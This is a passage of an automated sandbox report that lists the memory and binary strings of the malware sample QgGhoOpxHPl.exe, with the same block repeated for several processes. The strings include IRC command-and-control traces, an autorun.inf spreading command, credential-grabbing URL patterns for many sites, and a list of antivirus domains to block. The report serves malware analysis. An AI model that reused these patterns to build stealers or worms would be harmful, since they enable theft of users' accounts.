            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sends